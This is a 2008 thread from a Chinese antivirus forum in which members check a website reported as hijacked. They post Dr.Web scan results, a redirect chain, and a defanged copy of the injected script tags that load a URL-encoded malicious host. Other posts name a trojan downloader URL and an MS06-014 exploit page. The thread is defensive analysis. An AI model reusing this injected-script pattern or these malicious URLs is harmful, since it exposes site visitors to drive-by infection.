楼主: jizhenhang
收起左侧

[已鉴定] 求大家抓个马!

 关闭 [复制链接]
电影结束了
发表于 2008-9-14 20:27:00 | 显示全部楼层

好熟的面孔~
woai_jolin
发表于 2008-9-14 20:27:22 | 显示全部楼层
sina.exe
woai_jolin
发表于 2008-9-14 20:27:42 | 显示全部楼层
Checking: http://www.lwlms.com/
Engine version: 4.44.0.9170
File size: 95.07 KB

http://www.lwlms.com/ - archive HTML
>http://www.lwlms.com//javascript.0 - Ok
>http://www.lwlms.com//Script.1 - Ok
http://www.lwlms.com/ - Ok

Checking: http://%61%76%65%32%2E%63%6E
File size: 586 bytes

http://%61%76%65%32%2E%63%6E - Ok
woai_jolin
发表于 2008-9-14 20:29:21 | 显示全部楼层

http://down.hs7yue.cn/down/sina.exe

Error
Can't fetch file pointed by your url. This may be caused by several reasons:

Remote file is not available (not found, requires authentication, permission denied)
Remote site is down, or very slow, or busy
No network connectivity between Dr.Web online server and remote web-site
File too big
Amitayus
发表于 2008-9-14 20:33:54 | 显示全部楼层

It's nothing....

李惠利中学 ,......我裸机上,15分钟一切正常,.....IE7,打齐微软补丁,打开源码,发现问题了,确实挂了马~~!!!


代码如下:
<!--网站制作:贾学平|工作室地址:www.m*****o.cn|联系电话:6313****** | qq:63*******5-->
<script sr c=http://%61%7 6%65%32%2E%63%6E></s cript><s cript src=http://%61% 76%65%32%2E%63%6E></s cript><script s rc=http://%61%76%65%32%2 E%63%6E></s cript>
<scr ipt src=http:// %61%76%65%32%2E%63%6E></ script><sc ript src=http://%61%76%65% 32%2E%63%6E></scri pt><script src=http://%61%76%65%32%2E% 63%6E></s cript>
   
注:    此代码已做处理,贴在这里没有危害了....
dl123100
发表于 2008-9-14 20:37:08 | 显示全部楼层
访问地址:http://www.hrz010.cn/a1/ms06014.htm
访问网页的进程:"C:\Program Files\Maxthon2\Maxthon.exe"
漏洞对象名:microsoft.xmlhttp
woai_jolin
发表于 2008-9-14 20:39:51 | 显示全部楼层
Checking: http://www.hrz010.cn/a1/ms06014.htm
Engine version: 4.44.0.9170
File size: 2498 bytes

http://www.hrz010.cn/a1/ms06014.htm - archive HTML
>http://www.hrz010.cn/a1/ms06014.htm/VBScript.0 infected with Exploit.MS06-014.23
>http://www.hrz010.cn/a1/ms06014.htm/JavaScript.1 - Ok
>http://www.hrz010.cn/a1/ms06014.htm/VBScript.2 infected with Trojan.DownLoad.4559
>http://www.hrz010.cn/a1/ms06014.htm/Script.3 - Ok
molicn
发表于 2008-9-14 20:39:57 | 显示全部楼层
全部上报相关信息
jizhenhang
 楼主| 发表于 2008-9-14 20:43:20 | 显示全部楼层
原帖由 molicn 于 2008-9-14 20:16 发表
发现挂马
Log is generated by FreShow.
[wide]http://www.lwlms.com/
    [script]http://%61%76%65%32%2E%63%6E
        [frame]http://asp-15.cn/ilink.html
            [script]http://asp-15.cn/swfobjec ...


这位大哥好强大,你能不能收小弟当徒弟?
qigang
发表于 2008-9-14 20:59:18 | 显示全部楼层
虽然挂的是老地址,但东西更新了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 05:41 , Processed in 0.088667 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表